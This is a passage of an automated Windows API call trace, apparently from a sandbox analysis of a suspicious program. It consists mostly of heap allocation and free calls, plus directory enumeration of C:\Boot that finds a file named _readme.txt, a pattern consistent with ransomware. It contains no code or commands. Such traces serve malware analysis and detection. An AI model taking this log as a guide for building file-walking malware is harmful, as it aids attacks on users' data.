hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa90 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef248 | out: hHeap=0x680000) returned 1 [0092.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bc228 | out: hHeap=0x680000) returned 1 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef248 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.985] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa347d1e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa347d1e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa90 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.985] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.985] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.985] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.985] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa31cf920, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa31cf920, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31cf920, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.985] PathFindExtensionW (pszPath="C:\\Boot\\_readme.txt") returned=".txt" [0092.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0092.985] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa31cf920, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa31cf920, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31cf920, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0092.986] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0092.986] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0092.986] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0092.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.990] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.990] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.991] RtlAllocateHeap 